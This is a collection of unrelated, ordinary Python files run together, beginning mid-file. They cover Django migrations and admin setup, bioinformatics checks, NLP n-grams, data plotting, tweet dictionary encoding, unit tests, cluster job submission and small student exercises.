print(line,end="")
else:
break
f.close()
|
# Generated by Django 3.0.4 on 2020-03-13 15:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0007_auto_20200313_1533'),
]
operations = [
migrations.RemoveField(
model_name='wplyw',
name='inflow',
),
migrations.RemoveField(
model_name='wplyw',
name='outflow',
),
migrations.AddField(
model_name='wplyw',
name='flow',
field=models.CharField(choices=[('Wpływ', 'Wpływ'), ('Rozchód', 'Rozchód')], default='Wybierz', max_length=10),
),
migrations.AddField(
model_name='wplyw',
name='how_much',
field=models.DecimalField(decimal_places=2, default=0.0, max_digits=9999),
),
]
|
#!/usr/bin/env python
import sys
import os
import operator
import gffutils
import collections
import re
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
STOPCODONPAT = re.compile('.*[*#+].*')
fails = collections.defaultdict(lambda: collections.defaultdict(int))
def get_protein(fdb, mrna, seqs):
seq_exons = []
cdslist = list(fdb.children(mrna, featuretype='CDS'))
cdslist.sort(key=lambda f: f.start)
for c in cdslist:
seq_exons.append(str(seqs[c.seqid][c.start-1:c.end].seq))
gene_seq = Seq(''.join(seq_exons))
if mrna.strand == '-':
gene_seq = gene_seq.reverse_complement()
return str(gene_seq.translate())
def has_transcript(fdb, gene, seqs):
if sum(1 for i in
fdb.children(gene, featuretype=['mRNA','tRNA','snRNA',
'rRNA','snoRNA','ncRNA'])) == 0:
fails['gene']['has_transcript'] += 1
def children_in_coords(fdb, gene, seqs):
for c in fdb.children(gene):
if c.start < gene.start or c.end > gene.end:
fails['gene']['children_in_coords'] += 1
def children_consistent_strands(fdb, gene, seqs):
for c in fdb.children(gene):
if c.strand != gene.strand:
fails['gene']['children_consistent_strands'] += 1
def not_suspiciously_short(fdb, gene, seqs):
if gene.end - gene.start + 1 <= 30:
fails['gene']['not_suspiciously_short'] += 1
def n_content(fdb, mrna, seqs):
mrna_seq = seqs[mrna.seqid][mrna.start-1:mrna.end].seq.lower()
if mrna_seq.count('n')/float(mrna.end - mrna.start + 1) >= 0.5:
fails['mRNA']['n_content'] += 1
def has_CDS(fdb, mrna, seqs):
if sum(1 for i in fdb.children(mrna, featuretype='CDS')) == 0:
fails['mRNA']['has_CDS'] += 1
def has_only_CDS_and_UTR_children(fdb, mrna, seqs):
num_children = sum(1 for i in fdb.children(mrna))
num_cds_utr = sum(1 for i in fdb.children(mrna,
featuretype=['CDS','five_prime_UTR','three_prime_UTR']))
if num_children != num_cds_utr:
fails['mRNA']['has_only_CDS_and_UTR_children'] += 1
def minimum_length(fdb, mrna, seqs):
if mrna.end - mrna.start + 1 < 3:
fails['mrna']['minimum_length'] += 1
def internal_stop_codon(fdb, mrna, seqs):
prot_seq = get_protein(fdb, mrna, seqs)
if STOPCODONPAT.match(prot_seq[:-1]):
fails['mrna']['internal_stop_codon'] += 1
def has_no_children(fdb, cds, seqs):
if sum(1 for i in fdb.children(cds)) > 0:
fails['cds']['has_no_children'] += 1
checks = {}
checks = { 'gene' : [has_transcript,
children_in_coords,
children_consistent_strands,
not_suspiciously_short],
'mRNA' : [n_content,
has_CDS,
has_only_CDS_and_UTR_children,
minimum_length,
internal_stop_codon],
'CDS' : [has_no_children] }
def main(gff_file, ref_file):
seqs = SeqIO.to_dict(SeqIO.parse(ref_file, "fasta"))
fdb = gffutils.FeatureDB(gff_file, keep_order=True)
#print get_protein(fdb, fdb['LmjF.12.0867:mRNA'], seqs)
#sys.exit()
for f in fdb.all_features():
if checks.has_key(f.featuretype):
for check in checks[f.featuretype]:
check(fdb, f, seqs)
for x in fails:
print(x)
for y in fails[x]:
print (y, fails[x][y])
if __name__ == "__main__":
if len(sys.argv) != 3:
print(__doc__)
sys.exit()
main(*sys.argv[1:])
|
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name='acme',
version='0.0.1',
description='Exaxmple project showing how to include a Python package dependency while rendering notebooks with notebook-rendering',
author='Triage Technologies Inc.',
author_email='ai@triage.com',
url='https://www.triage.com/',
packages=find_packages(exclude=['tests', '.cache', '.venv', '.git', 'dist']),
install_requires=[
'Pillow',
'matplotlib',
]
)
|
'''
Created on Mar 3, 2015
@author: fan
'''
import unittest
from lang._math import pi2List
class SetTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_set(self):
print("type({}) = %s" % type({}), "type({1, 2, 3}) = %s" % type({1, 2, 3}))
_list = pi2List(10)
print("_list = %s" % _list)
_set = set(_list)
print("_set = %s" % _set)
def test_access_set(self):
s = set(range(0, 10))
print(s)
print("len(s) = %d" % len(s))
try:
print("s[1] = %d" % s[1])
print("s[1:5] = %s" % s[1:5])
except Exception as ex:
print(ex)
[print("%d ** 2 = %d" % (e, r ** 2)) for (e, r) in enumerate(s)]
def test_set_add(self):
a_set = {1, 2, 3}
print(type(a_set), len(a_set), a_set)
b_set = a_set
print("b_set = a_set", type(b_set), len(b_set), b_set)
a_set.add(0)
print("a_set", type(a_set), len(a_set), a_set)
print("b_set", type(b_set), len(b_set), b_set)
def test_remove(self):
a_set = {1, 2, 3}
print(a_set)
a_set.remove(2)
print("a_set.remove(2)", a_set)
a_set.remove(2)
print("a_set.remove(2)", a_set)
def test_discard(self):
a_set = {1, 2, 3}
print(a_set)
a_set.discard(2)
print("a_set.discard(2)", a_set)
a_set.discard(2)
print("a_set.discard(2)", a_set)
def test_udpate(self):
s1 = {1, 2, 3, 4, 5}
s2 = {2, 4, 6, 8, 10}
print(s1, s2)
s1.update(s2)
print("s1.update(s2)\n", s1, s2)
def test_pop(self):
s1 = set(range(0, 9))
print(len(s1), s1)
while (len(s1) > 0):
print(s1.pop(), '\t', len(s1), s1)
print(len(s1), s1)
print()
s1 = set([str(e) for e in range(0, 9)])
print(len(s1), s1)
while (len(s1) > 0):
print(s1.pop(), '\t', len(s1), s1)
print(len(s1), s1)
def test_clear(self):
s1 = set(range(0, 9))
print(len(s1), s1)
s1.clear()
print("s1.clear()\n", len(s1), s1)
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
import re
from operator import itemgetter, attrgetter, methodcaller
class Entry:
def __init__(self, id,weight, length):
self.id=id
self.weight=weight
self.length=length
self.diff=weight-length
self.ratio=float(weight)/length
f=open('jobs.txt','r')
number=int(f.readline())
#number=10
item_set=[]
#for i in range(number):
for i in range(number):
numbers=map(int,f.readline().split())
item_set.append(Entry(i,numbers[0],numbers[1]))
for i in range(0):
print item_set[i].id,item_set[i].diff, item_set[i].ratio
item_set=sorted(item_set, key=attrgetter('weight'),reverse=True)
item_set=sorted(item_set, key=attrgetter('diff'),reverse=True)
for i in range(0):
print item_set[i].id,item_set[i].diff, item_set[i].weight
# print numbers
time = 0
sum = 0
for i in range(number):
time = time+item_set[i].length
sum = sum+time*item_set[i].weight
print sum
f.close()
|
import random
import time
from TagScriptEngine import Verb, Interpreter, block, adapter
blocks = [
block.MathBlock(),
block.RandomBlock(),
block.RangeBlock(),
block.StrfBlock(),
block.AssignmentBlock(),
block.FiftyFiftyBlock(),
block.LooseVariableGetterBlock()
]
x = Interpreter(blocks)
# data to inject
dummy = {
"message": adapter.StringAdapter("Hello, this is my message.")
}
def timerfunc(func):
"""
A timer decorator
"""
def function_timer(*args, **kwargs):
"""
A nested function for timing other functions
"""
start = time.time()
value = func(*args, **kwargs)
end = time.time()
runtime = end - start
msg = "The runtime for {func} took {time} seconds to complete 1000 times"
print(msg.format(func=func.__name__,
time=runtime))
return value
return function_timer
@timerfunc
def v2_test():
for i in range(1000):
x.process("{message} {#:1,2,3,4,5,6,7,8,9,10} {range:1-9} {#:1,2,3,4,5} {message} {strf:Its %A}", dummy)
if __name__ == '__main__':
v2_test()
|
#BMI Calculator
#HW6q1
#I pledge my honor that I have abided by the Stevens Honor System
def main():
weight = float(input("Enter your weight in pounds: "))
height = float(input("Enter your height in inches: "))
BMI = round((weight*720)/height**2, 3)
if BMI <= 0:
print("Error in calculating BMI. Weight cannot be negative.")
elif 0 < BMI < 19:
print("Your BMI is", BMI, "and is BELOW the healthy range.")
elif 19 <= BMI <= 25:
print("Your BMI is", BMI, "and is WITHIN the healthy range.")
else:
print("Your BMI is", BMI, "and is ABOVE the healthy range.")
main()
|
# Python Standard Libraries
# N/A
# Third-Party Libraries
from rest_framework import serializers
# Custom Libraries
from api.models import User
from . import digger_model
class SignUpSerializer(serializers.ModelSerializer):
# Ensure passwords are at least 8 characters long, no longer than 128
# characters, and can not be read by the client.
password = serializers.CharField(max_length=128,
min_length=8,
write_only=True)
# The client should not be able to send a token along with a registration
# request. Making `token` read-only handles that for us.
token = serializers.CharField(max_length=255, read_only=True)
class Meta:
# Pretty sure this should be using the setings AUTH_USER_MODEL???
# model = settings.AUTH_USER_MODEL
model = User
fields = "__all__"
def create(self, validated_data):
new_user = User.objects.create_user(email=validated_data["email"],
password=validated_data["password"],
username=validated_data["username"])
# Digger is created to connect the play context with the user context
new_digger = digger_model.Digger.objects.create(linked_user=new_user)
return new_user
|
# color = input('Enter "green", "yellow", "red": ').lower()
# print(f'The user entered {color}')
# if color == 'green':
# print('Go!')
# elif color == 'yellow':
# print('Slow down!')
# elif color == 'red':
# print('Stop!')
# else:
# print('Bogus!')
hours = int(input('Enter hours worked:'))
rate = 10
overtime = int((hours - 40) * (1.5 * rate))
paycheck = 0
if hours <= 40:
paycheck += (int(hours * rate))
else:
paycheck += (int((hours * rate) + (overtime)))
print(f'Pay: {paycheck}')
|
import nltk
f=open('cricket.txt','r',encoding='utf8')
raw=f.read()
#nltk.download('punkt')
tokens = nltk.word_tokenize(raw)
text = nltk.Text(tokens)
print(text)
for i in range(len(tokens)):
tokens[i]= tokens[i].lower()
#removing digits
tokens= [x for x in tokens if not x.isdigit()]
#converting list into strings
tokens_str=' '.join(tokens)
#Removing the punctuations,tokenizer automatically convers string to list
from nltk.tokenize import RegexpTokenizer
tokenizer = RegexpTokenizer(r'\w+')
token_rem_punc= tokenizer.tokenize(tokens_str)
#Filtering the digits again
#tokens_NDP means NO DIGITS and PUNCTUATION
tokens_NDP= [x for x in token_rem_punc if not x.isdigit()]
#process to remove stopwords
nltk.download('stopwords')
from nltk.corpus import stopwords
#NO DIGITS PUNCTUATIONS AND STOPWORDS
tokens_NDPSW= [word for word in tokens_NDP if not word in set(stopwords.words('english'))]
#converting to string again to generate bigrams and trigrams
text_final = ' '.join(tokens_NDPSW)
#Generating Bi-grams
from nltk import ngrams
n1=2
bigrams=ngrams(text_final.split(),n1)
bigrams_list=[]
for x in bigrams:
bigrams_list.append(x)
#Generating tri-grams
n2=3
tri_grams=ngrams(text_final.split(),n2)
trigrams_list=[]
for x in tri_grams:
trigrams_list.append(x)
#Top 10 words in the tokens
count_list={} #creating the dictionary for word count
top10_list=[]
#Form the dictionary
for x in tokens_NDPSW:
c=tokens_NDPSW.count(x)
count_list[x]=c
#sorted_count_list is a list of tuples containing count of each word in the dictionary
import operator
sorted_count_list=sorted(count_list.items(),key=operator.itemgetter(1),reverse=True)
top10_list=sorted_count_list[0:10]
|
import scipy
from numpy import *
import scipy.integrate
# defining the fuction
def F(x):
return x*(scipy.exp(-x))
# Finding the integral
I, errt = scipy.integrate.quad(F,0,inf)
print 'The integrated result = ',int(round(I,0))
|
if True:
print("eita danada, olha que indentou e funcionou!")
"""
if True:
print("esse codigo nao vai funcionar por falta de indentacao, por isso esta comentado!")
"""
|
import numpy as np
import pandas as pd
class TrainingDataLabelPreprocessor:
def __init__(self, training_data):
# eg. training_data = pd.read_csv('train/train.csv')
self.training_data = training_data
# Create a dictionary assigning labels to each
# of the 28 cell functions/locations
self.label_names = {
0: "Nucleoplasm",
1: "Nuclear membrane",
2: "Nucleoli",
3: "Nucleoli fibrillar center",
4: "Nuclear speckles",
5: "Nuclear bodies",
6: "Endoplasmic reticulum",
7: "Golgi apparatus",
8: "Peroxisomes",
9: "Endosomes",
10: "Lysosomes",
11: "Intermediate filaments",
12: "Actin filaments",
13: "Focal adhesion sites",
14: "Microtubules",
15: "Microtubule ends",
16: "Cytokinetic bridge",
17: "Mitotic spindle",
18: "Microtubule organizing center",
19: "Centrosome",
20: "Lipid droplets",
21: "Plasma membrane",
22: "Cell junctions",
23: "Mitochondria",
24: "Aggresome",
25: "Cytosol",
26: "Cytoplasmic bodies",
27: "Rods & rings"
}
self.label_names_reversed_keys = dict((value, key) for key, value in self.label_names.items())
def preprocess_data(self):
self.multi_hot_encode()
self.apply_number_of_targets_col()
def fill_targets(self, row):
# Multi hot encode the training data and correct responses
row.Target = np.array(row.Target.split(" ")).astype(np.int)
for num in row.Target:
name = self.label_names[int(num)]
row.loc[name] = 1
return row
def multi_hot_encode(self):
for key in self.label_names.keys():
self.training_data[self.label_names[key]] = 0
self.training_data = self.training_data.apply(self.fill_targets, axis=1)
def apply_number_of_targets_col(self):
self.training_data["number_of_targets"] = self.training_data.drop(
["Id", "Target"],axis=1).sum(axis=1)
|
import datetime
import csv
import itertools
import numpy as np
import matplotlib.pyplot as plt
import scipy as sp
import scipy.signal as signal
now = datetime.datetime.now()
def graficar_temp():
tiempo=[]
temperatura=[]
with open('data.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
temp=float(row[0])
time=float(row[4])
temperatura.append(temp)
tiempo.append(time)
fig1=plt.figure(1)
ax = fig1.add_subplot(1, 1, 1)
axes = plt.gca()
axes.set_xlim([0,24])
axes.set_ylim([0,30])
# Major ticks every 20, minor ticks every 5
major_ticks = np.arange(0, 23.1, 1)
minor_ticks = np.arange(0, 23.1, 0.5)
ax.set_xticks(major_ticks)
ax.set_xticks(minor_ticks, minor=True)
# ax.set_yticks(major_ticks)
# ax.set_yticks(minor_ticks, minor=True)
plt.plot(tiempo,temperatura, 'm')
plt.xlabel('Tiempo (horas)')
plt.ylabel('Temperatura (C)')
plt.title('Temperatura')
plt.grid(True)
plt.savefig("graphT.png")
#plt.show()
def graficar_nivel():
tiempo=[]
distancia=[]
with open('data.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
time=float(row[4])
dist=float(row[1])
tiempo.append(time)
distancia.append(dist)
distancia_f=sp.signal.medfilt(distancia,21)
print(len(tiempo))
print(len(distancia_f))
fig3=plt.figure(3)
ax = fig3.add_subplot(1, 1, 1)
axes = plt.gca()
axes.set_xlim([0,24])
axes.set_ylim([0,100])
# Major ticks every 20, minor ticks every 5
major_ticks = np.arange(0, 23.1, 1)
minor_ticks = np.arange(0, 23.1, 0.5)
ax.set_xticks(major_ticks)
ax.set_xticks(minor_ticks, minor=True)
# ax.set_yticks(major_ticks)
# ax.set_yticks(minor_ticks, minor=True)
plt.plot(tiempo,distancia_f, 'm')
plt.xlabel('Tiempo (horas)')
plt.ylabel('Porcentaje nivel de alimento')
plt.title('Nivel de alimento')
plt.grid(True)
plt.savefig("graphA.png")
#plt.show()
def graficar_hum():
tiempo=[]
humedad=[]
with open('data.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
time=float(row[4])
humed=float(row[2])
tiempo.append(time)
humedad.append(humed)
fig2=plt.figure(2)
ax = fig2.add_subplot(1, 1, 1)
axes = plt.gca()
axes.set_xlim([0,24])
axes.set_ylim([0,100])
# Major ticks every 20, minor ticks every 5
major_ticks = np.arange(0, 23.1, 1)
minor_ticks = np.arange(0, 23.1, 0.5)
ax.set_xticks(major_ticks)
ax.set_xticks(minor_ticks, minor=True)
# ax.set_yticks(major_ticks)
# ax.set_yticks(minor_ticks, minor=True)
plt.plot(tiempo,humedad,'m')
plt.xlabel('Tiempo (horas)')
plt.ylabel('Humedad ')
plt.title('Humedad vs Tiempo')
plt.grid(True)
plt.savefig("graphH.png")
#plt.show()
def graficar_luminosidad():
tiempo=[]
luminosidad=[]
with open('data.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
time=float(row[4])
lum=float(row[3])
tiempo.append(time)
luminosidad.append(lum)
fig4=plt.figure(4)
ax = fig4.add_subplot(1, 1, 1)
axes = plt.gca()
axes.set_xlim([0,24])
axes.set_ylim([0,100])
# Major ticks every 20, minor ticks every 5
major_ticks = np.arange(0, 23.1, 1)
minor_ticks = np.arange(0, 23.1, 0.5)
ax.set_xticks(major_ticks)
ax.set_xticks(minor_ticks, minor=True)
# ax.set_yticks(major_ticks)
# ax.set_yticks(minor_ticks, minor=True)
plt.plot(tiempo,luminosidad, 'm')
plt.xlabel('Tiempo (horas)')
plt.title('Luminosidad')
plt.grid(True)
plt.savefig("luz.png")
#plt.show()
#graficar_temp()
#graficar_nivel()
#graficar_hum()
#graficar_luminosidad()
|
#Dict-based spectral encoding of given traits based on dictionary word-matching!
#Dominic Burkart
#use: take in all given .txt wordlists in the directory this file is saved in for a given
# trait (eg emotionality) and encode a given set of tweets with the wordcount from the
# given dictionary and the ratio of words in the tweet also in the dictionary/total #
# of words in the tweet.
#for MEC project current version: 20 November 2015 (version 6)
# -assumes that words in tweet are separated by spaces/punctuation to allow for tokenization
# -no error checking for faulty input.
#get filepath for data + content index
inputfiledir = input("\ndata file directory: ")
tw_content_indx = int(input("tweet text index in input file (usually 10): "))
print("\n")
#using standard modules
import csv
import os
#code for cleaning up strings (in dictionaries and in tweets)
punctuation = '''!"#$%&'()*+,-./:;<=>?[\]^_`{|}~'''#missing @ at the request of Julian
def clean(instring, spaces = True): #removes punctuation and double spaces, replacing them w/ single spaces
instring.replace("\n"," ")
for x in punctuation:
instring = instring.replace(x, " ")
if spaces:
while instring.find(" ") > -1:
instring = instring.replace(" ", " ")
else:
while instring.find(" ") > -1:
instring = instring.replace(" ","")
instring = instring.lower()
return instring
#gets dictionaries
curlist = os.listdir(os.getcwd())
temp = []
wordlists = [] #will hold individual words (eg fun)
stemlists = [] #will hold stems (eg funn*)
listnames = [] #will hold the names of keyword files (to be used as variable names)
i = 0
for fname in curlist:
if fname.endswith(".txt"): #new list of keywords!
wordlists.append([])
stemlists.append([])
temp.append(open(fname, encoding = "utf-8").read().splitlines())
i_of_x = 0
for x in temp[i]:
if temp[i][i_of_x].find("*") > -1:
stemlists[i].append(clean(temp[i][i_of_x], spaces = False))
else:
wordlists[i].append(clean(temp[i][i_of_x], spaces = False))
i_of_x += 1
uncheckedSpace = True
uncheckedBlank = True
while uncheckedSpace or uncheckedBlank:
try:
wordlists[i].remove(" ")
except ValueError:
uncheckedSpace = False
try:
wordlists[i].remove("")
except ValueError:
uncheckedBlank = False
print("Imported dictionary: "+fname)
i += 1
listnames.append(fname.split(".")[0])
print("\n")
#creates list of output datafield names based on wordlist file names
temp = []
for x in listnames:
temp.append(x+"Count")
for x in listnames:
temp.append(x+"Ratio")
listnames = temp
#removes duplicates
for x in range(len(wordlists)):
wordlists[x] = set(wordlists[x])
#opens our data and output files
indoc = open(inputfiledir, encoding = "utf-8")
out = open("SpectralEncodingOut.csv", mode = "w", encoding = "utf-8")
outdoc= csv.writer(out, lineterminator ="\n")
tagOut = open("hashtagDict.csv", mode = "w", encoding = "utf-8")
hashtagDict = csv.writer(tagOut, lineterminator = "\n")
#takes a line from the in data and encodes it
def findInTweet(line, wordlists):
hashtagCheck(line)
content = clean(line[tw_content_indx]).split(" ")
counts = []
ratios = []
for x in range(len(wordlists)):
counts.append(0) #populates number of variables (eg emotionality)
ratios.append(0)
for lists in wordlists: #start by grabbing words
for word in lists:
counts[wordlists.index(lists)] += content.count(word)
for lists in stemlists: #then grab stems
for stem in lists:
for token in content:
if token.startswith(stem):
counts[stemlists.index(lists)] += 1
for x in range(len(counts)): #same as len(wordlists)
ratios[x] = counts[x]/len(content)
line.extend(counts)
line.extend(ratios)
outdoc.writerow(line)
#takes a line from the in data and encodes it
def showTokens(line):
content = clean(line[tw_content_indx]).split(" ")
words = []
for lists in wordlists: #start by grabbing words
for word in lists:
if word in content:
words.append(word)
for lists in stemlists: #then grab stems
for stem in lists:
for token in content:
if token.startswith(stem):
words.append(token)
return words
#finds the end of a hashtag for hashtagCheck
notTag = list(''' !"#$%&'()*+,-./:;<=>?[\]^_`{|}~''')
def final(t):
last = 1
while last < len(t):
if t[last] in notTag:
return last
last +=1
return last
#holds our hashtags
hashtags = {}
def hashtagCheck(line):
toks = line[tw_content_indx].split(" ")
for t in toks:
if t.startswith("#"):
last = final(t)
try:
hashtags[t[1:last]] += 1
except KeyError:
hashtags[t[1:last]] = 1
#iterates through the input file, calling the methods to find and write output.
inheader = True
for line in csv.reader(indoc):
if inheader: #to copy over header to the new doc + add the new columns :)
line.extend(listnames)
outdoc.writerow(line)
print("populating output file, please wait.")
inheader = False
else: #to count words + ratios for each tweet and then right those values to out :)
findInTweet(line,wordlists)
print("\nencoding complete.")
print("\nSaving hashtag dictionary.")
for h in hashtags:
line = [h, hashtags[h]]
hashtagDict.writerow(line)
indoc.close()
out.close()
tagOut.close()
print("\n Program complete.")
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
optickscore-/tests/IndexerTest
================================
GPU and CPU indices mismatch
-----------------------------
Maybe a stable sort type of issue.
In any case discrepancies are all in the low frequency of occurence tail,
so probably acceptable.
::
seqhis
[[ 28 29]
[ 22 23]
[ 23 22]
[ 32 255]
[ 23 22]
[ 28 29]
[255 32]
[ 31 30]
[ 22 23]
[ 23 22]
[ 31 30]
[ 23 22]
[ 23 22]
[ 22 23]
[ 22 23]
[ 31 30]
[ 29 31]
[ 23 22]
[ 32 255]
[ 22 23]
[255 32]
[ 22 23]
[ 28 29]
[ 22 23]
[ 23 22]
[ 29 31]
[ 30 28]
[ 30 28]
[ 30 28]
[ 29 31]]
"""
import os, logging, numpy as np
log = logging.getLogger(__name__)
from opticks.ana.ana import Evt
def compare(a, b):
return np.vstack([a,b]).T[a != b]
if __name__ == '__main__':
typ = "torch"
tag = "4"
det = "dayabay"
cat = "PmtInBox"
evt = Evt(tag=tag, src=typ, det=cat)
print evt
ps = np.load("/tmp/phosel.npy")
print "seqhis\n", compare(evt.ps[:,0,0], ps[:,0,0])
print "seqmat\n", compare(evt.ps[:,0,1], ps[:,0,1])
|
#coding:utf-8
#!/usr/bin/env python
import sys
serverid = 1
|
import xadmin
from .models import ProductMsg
from .models import Supplier
from .models import TicketsMsg
from .models import HotelMsg
from .models import StrategyMsg
from .models import Product_City
from .models import Product_Senic
# Register your models here.
# xadmin中这里是继承object,不再是继承admin
class ProductMsgAdmin(object):
# 显示的列
list_display = ['id', 'name', 'traver_days',
'product_type', 'supplier',
'product_link', 'score', 'sell_num']
# 搜索的字段
search_fields = ['id','name', 'product_type']
# 过滤
list_filter = ['id', 'name', 'supplier',
'product_link', 'score', 'sell_num']
class ProductCityAdmin(object):
# 显示的列
list_display = ['product_id', 'city_id', 'product_price']
# 搜索的字段
search_fields = ['city_id','product_id']
# 过滤
list_filter = ['product_id', 'city_id', 'product_price']
class ProductScenicAdmin(object):
# 显示的列
list_display = ['product_id', 'senic_name']
# 搜索的字段
search_fields = ['senic_name','product_id']
# 过滤
list_filter = ['product_id', 'senic_name']
class SupplierAdmin(object):
# 显示的列
list_display = ['id', 'name', 'link_url', 'cooperation_type']
# 搜索的字段
search_fields = ['name', 'cooperation_type']
# 过滤
list_filter = ['id', 'name', 'link_url', 'cooperation_type']
class TicketMsgAdmin(object):
# 显示的列
list_display = ['id', 'scenic_name', 'city_name', 'img_url', 'score','ticket_link', 'scense_address',
'ticket_price']
# 搜索的字段
search_fields = ['id','scenic_name','city_name']
# 过滤
list_filter = ['id', 'scenic_name','city_name', 'ticket_content', 'ticket_price']
class HotelMsgAdmin(object):
# 显示的列
list_display = ['name', 'score', 'hotel_price', 'img_url','hotel_link',
'hotel_content', 'city_name', 'supplier_id' ]
# 搜索的字段
search_fields = ['name','hotel_content', 'city_name']
# 过滤
list_filter = ['id', 'name', 'score', 'hotel_price','city_name',
'img_url', 'supplier_id', 'hotel_link']
class StrategyMsgAdmin(object):
# 显示的列
list_display = ['id', 'title', 'link_url', 'simple_content', 'supplier_id', 'img_url', 'scenic_name']
# 搜索的字段
search_fields = ['title', 'link_url']
# 过滤
list_filter = ['id', 'title', 'link_url', 'simple_content', 'supplier_id', 'img_url', 'scenic_name']
# 将基本配置管理与view绑定
xadmin.site.register(Supplier, SupplierAdmin)
xadmin.site.register(ProductMsg, ProductMsgAdmin)
xadmin.site.register(TicketsMsg, TicketMsgAdmin)
xadmin.site.register(HotelMsg, HotelMsgAdmin)
xadmin.site.register(StrategyMsg, StrategyMsgAdmin)
xadmin.site.register(Product_Senic, ProductScenicAdmin)
xadmin.site.register(Product_City, ProductCityAdmin)
|
#!/usr/bin/python
import numpy as np
import os
numpul=20 #Number of PPTA pulsars.
for pulsi in xrange(numpul):
gfilename='G_SNR_z_vs_mc_PPTA_model_i/pulsar_%s.gstar' %(pulsi+1)
#Content of the gstar file:
filetext=['#!/bin/csh \n\
#PBS -q gstar \n\
#PBS -l nodes=1:ppn=6 \n\
#PBS -l pmem=500mb \n\
#PBS -l walltime=10:00:00 \n\
#PBS -N O_pulsar_%s \n\
#PBS -o O_output_pulsar_%s \n\
#PBS -e O_error_pulsar_%s \n\
\n\
echo Deploying job to CPUs ... \n\
cat $PBS_NODEFILE \n\
\n\
python /home/prosado/horizon/python/SNR_z_vs_mc_PPTA_model_i.py %s' %(pulsi+1,pulsi+1,pulsi+1,pulsi)]
np.savetxt(gfilename, filetext, fmt='%s', newline='\n')
task='qsub ./'+gfilename
print task
os.system(task)
|
"""Unit test for treadmill.runtime.linux.runtime.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import io
import os
import shutil
import tempfile
import unittest
# Disable W0611: Unused import
import tests.treadmill_test_skip_windows # pylint: disable=W0611
import mock
from treadmill import exc
from treadmill import services
from treadmill import utils
from treadmill.appcfg import abort as app_abort
from treadmill.runtime.linux import runtime
class LinuxRuntimeTest(unittest.TestCase):
"""Tests for treadmill.runtime.linux.runtime.LinuxRuntime."""
def setUp(self):
self.root = tempfile.mkdtemp()
self.tm_env = mock.Mock(
configs_dir=os.path.join(self.root, 'confs')
)
self.container_dir = os.path.join(self.root, 'apps', 'foo.bar-0-baz')
self.data_dir = os.path.join(self.container_dir, 'data')
os.makedirs(self.data_dir)
patch = mock.patch(
'treadmill.supervisor.open_service',
return_value=mock.Mock(
data_dir=self.data_dir
)
)
patch.start()
self.addCleanup(patch.stop)
def tearDown(self):
if self.root and os.path.isdir(self.root):
shutil.rmtree(self.root)
@mock.patch('treadmill.runtime.linux.runtime._load_config', mock.Mock())
def test_run_invalid_type(self):
"""Test run aborting with invalid type."""
with io.open(os.path.join(self.data_dir, 'app.json'), 'w') as f:
f.writelines(utils.json_genencode({'type': 'invalid'}, indent=4))
with self.assertRaises(exc.ContainerSetupError) as cm:
runtime.LinuxRuntime(self.tm_env, self.container_dir).run()
self.assertEqual(
cm.exception.reason, app_abort.AbortedReason.INVALID_TYPE
)
@mock.patch('treadmill.runtime.linux.runtime._load_config', mock.Mock())
@mock.patch(
'treadmill.runtime.linux._run.run',
side_effect=services.ResourceServiceTimeoutError(
'Resource not available in time'
)
)
def test_run_timeout(self, _mock_run):
"""Test run aborting with timeout."""
with io.open(os.path.join(self.data_dir, 'app.json'), 'w') as f:
f.writelines(utils.json_genencode({'type': 'native'}, indent=4))
with self.assertRaises(exc.ContainerSetupError) as cm:
runtime.LinuxRuntime(self.tm_env, self.container_dir).run()
self.assertEqual(
cm.exception.reason, app_abort.AbortedReason.TIMEOUT
)
if __name__ == '__main__':
unittest.main()
|
import sys, os
import argparse
import time
import datetime
from classes import Havelock
from classes import Bitcoin
from classes import Rates
from config import Config
from utils import get_console_size
import numpy as np
import matplotlib.pyplot as plot
import matplotlib.dates as md
cmdline_parse = cp = \
argparse.ArgumentParser(
description="BTC.de and Havelock portfolio analyser",
epilog="Blaaaaa.......")
cp.add_argument("-B", "--btcde-csv-file", type=str,
default=Config.btc_de_history,
help="Bitcoin.de transaction log / history")
cp.add_argument("-H", "--havelock-csv-file", type=str,
default=Config.hl_history,
help="Havelock transaction log / history")
cp.add_argument("-R", "--rate-file", type=str,
default=Config.rate_file,
help="File with rate for your symbols")
cp.add_argument("-S", "--start-time", type=str,
default="2010-01-01",
help="Time to start from in form %Y-%M-%D")
cp.add_argument("-X", "--symbol", type=str,
help="show one single symbol only")
args = cp.parse_args()
bitcoin = Bitcoin(Config)
havelock = Havelock(Config)
rates = Rates()
rates.load(args.rate_file)
fn = args.btcde_csv_file
if os.path.exists(fn) and os.path.isfile(fn):
bitcoin.loadTransactionFile(fn)
else:
print "[-] no bitcoin.de transaction history found..."
fn = args.havelock_csv_file
if os.path.exists(fn) and os.path.isfile(fn):
havelock.loadTransactionFile(fn)
else:
print "[-] no havelock transaction history found..."
#debug a single symbol
if args.symbol is not None:
print "analyse symbol {:s}".format(args.symbol)
s = havelock.portfolio.getSymbol(args.symbol)
#if s is None:
# print "failed to get data for that symbol"
# sys.exit(1)
if not rates.hasSymbol(args.symbol):
print "symbol not found in ratefile!"
sys.exit(1)
minTs = rates.getMinTimestamp(args.symbol)
maxTs = rates.getMaxTimestamp(args.symbol)
diff = maxTs - minTs
steps = diff / 200
timestamps = []
r = []
for ts in range(minTs, maxTs, steps):
timestamps.append(datetime.datetime.fromtimestamp(ts))
